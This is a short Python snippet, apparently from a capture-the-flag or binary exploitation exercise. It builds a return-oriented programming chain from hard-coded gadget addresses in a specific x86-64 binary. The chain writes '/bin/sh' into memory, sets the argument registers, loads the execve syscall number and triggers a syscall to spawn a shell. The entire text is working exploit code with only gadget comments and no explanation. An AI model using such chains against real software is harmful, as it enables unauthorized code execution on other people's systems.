payload = p64(0x4017d0)
#0x00000000004017d0: pop r14; pop r15; ret; 
payload += p64(0x449070)+p64(0x68662f6e69622f)+p64(0x405a47)
# 0x0000000000405a47: mov qword ptr [r14], r15; add rsp, 8; pop rbx; pop r14; pop r15; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x449070)+p64(0x41136d)
# 0x000000000041136d: pop rdx; ret; 
payload += p64(0x0)+p64(0x403462)
# 0x0000000000403462: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x42938b)
# 0x000000000042938b: pop rax; ret 0x23; 
payload += p64(0x3b)+p64(0x4146c5)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+"\x00"*3
# 0x00000000004146c5: syscall; 
payload += b''
